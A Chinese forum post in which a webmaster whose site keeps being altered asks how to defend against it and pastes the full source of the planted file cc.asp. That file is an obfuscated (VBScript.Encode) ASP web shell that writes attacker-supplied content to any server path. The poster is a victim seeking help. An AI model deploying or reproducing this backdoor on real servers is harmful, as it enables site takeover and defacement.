如何防止被"旁注 - 网站小助手"攻击?
最近我的网站经常被"旁注 - 网站小助手"
网站上的文件经常被修改,请问应该怎么预防。
我的网站程序sql防注入已经全都打好了,可是还是爱攻击
请高手们指点一下,谢谢了。要不没活路了。
下面是cc.asp的源代码
<%@LANGUAGE="VBScript.Encode" CODEPAGE="936"%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>旁注 - 网站小助手</title>
<style type="text/css">
<!--
.black {
font-family: "宋体";
font-size: 12px;
color: #000000;
text-decoration: none;
line-height: 120%;}
-->
</style>
<style type="text/css">
<!--
a:link {
font-family: "宋体";
font-size: 12px;
color: #00CC00;
text-decoration: none;
}
a:visited {
font-family: "宋体";
font-size: 12px;
color: #00CC00;
text-decoration: none;
}
a:hover {
font-family: "宋体";
font-size: 12px;
color: #333333;
text-decoration: none;
}
-->
</style>
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p>
<%#@~^DAAAAA==~9kh,W(LsUr,vQMAAA==^#~@%>
<%#@~^CwAAAA==~9kh,09lYmPmgMAAA==^#~@%>
<%#@~^EgAAAA==~9kh,W(LZKE OsbVnPXgYAAA==^#~@%>
<%#@~^FgAAAA==~Kx~DMWD,DdEs+~x6O~9wcAAA==^#~@%>
<%#@~^QAAAAA==~U+O,W(LsUr,xPU+.\D /M+lDnr(L+1OcJUmMk2YrUTRok^n?H/Onsr4%n1YE#,ThYAAA==^#~@%>
<%#@~^KQAAAA==~b0~:Db:`M+$;+kYcJkXW[alY4E#*@!@*rE~Y4+ PqgwAAA==^#~@%>
<%#@~^HQAAAA==~6NCDl,'PM+$;+kYcJ1XW[9lYmE#,mwkAAA==^#~@%>
<%#@~^QgAAAA==~U+O,W(LZKE OsbVn'K4%oUrR;.+mY+:naYwk^+cDn5!+dYvE/H0[2mYtEbBK.Eb,dRcAAA==^#~@%>
<%#@~^GgAAAA==~K4%;W!xYwk^nRqDrYPW[mYl,XQkAAA==^#~@%>
<%#@~^EAAAAA==~b0~DMP'ZPD4+ P1AQAAA==^#~@%>
<%#@~^NwAAAA==~M+daW /+chMrYPE@!6WUO,mW^GD{aswoo!Z@*保存成功e@!&0GUD@*EPNQ8AAA==^#~@%>
<%#@~^BgAAAA==~VdP6QEAAA==^#~@%>
<%#@~^NwAAAA==~M+daW /+chMrYPE@!6WUO,mW^GD{aswoo!Z@*保存失败e@!&0GUD@*EPNQ8AAA==^#~@%>
<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
<%#@~^CwAAAA==~D.cm^+lMPvgMAAA==^#~@%>
<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
<%#@~^FAAAAA==~K4%;W!xYwk^nR;VG/PKAcAAA==^#~@%>
<%#@~^GgAAAA==~U+O,W(LZKE OsbVn'gWO4bxo,ZAkAAA==^#~@%>
<%#@~^FgAAAA==~U+O,W(LsUr,xPgWOtbxL~AwcAAA==^#~@%>
<%#@~^HAAAAA==~"+daW /+chMrYPE@!J0G.s@*J,qQgAAA==^#~@%>
</p>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" bordercolor="#FFFFFF">
<tr>
<td height="100%">
<table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="700" border="0" align="center" cellpadding="0" cellspacing="1">
<tr>
<td bgcolor="#FFFFFF"><span class="black">
<%#@~^GwAAAA==~"+daW /+chMrYPE本文件绝对的路径J,TAYAAA==^#~@%>
<%=#@~^NwAAAA==dD-Dc:lawmOtvIn;!+dOc?+M-+M.lMrC4^+k`E?/]&nP{g)HAJbb,MhMAAA==^#~@%>
<br>
<%#@~^TQAAAA==~"+daW /+chMrYPE保存文件的@!6WUO,mW^GD{D+9@*绝对路径c包括文件名)如G)'hn4wacldw*l@!J0GUD@*J~txMAAA==^#~@%>
<%#@~^MwAAAA==~"+daW /+chMrYPE@!6W.h,lmDrW 'BEvvPs+DtGNx2K/O@*r~lRAAAA==^#~@%>
</span> </td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><span class="black">输入保存的路径:<%#@~^RgAAAA==~"+daW /+cMrYPE@!bx2;DPYH2+{Y+XO~xm:'dXW[alOt,Ak9Y4xy!!~dbyn'Rq@*J~qxcAAA==^#~@%>
</span></td>
</tr>
<tr>
<td bgcolor="#FFFFFF" class="black">
<%#@~^GwAAAA==~"+daW /+chMrYPE输入文件的内容:J,TAYAAA==^#~@%>
<%#@~^UwAAAA==~"+daW /+chMrYPE@!D+aOmD+m~xm:+{^z09NmYCP^G^/x%Z~DKhdx8!PAr9Y4'2+@*@!&D+XYlM+m@*J,ShsAAA==^#~@%>
</td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><div align="center"><span class="black">
<%#@~^MQAAAA==~"+daW /+chMrYPE@!bx2;DPYH2+{/E(hrY,\mV;+x保存@*rPIxAAAA==^#~@%>
</span></div></td>
</tr>
</tr>
<td bgcolor="#FFFFFF" class="black"><div align="center"></a></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>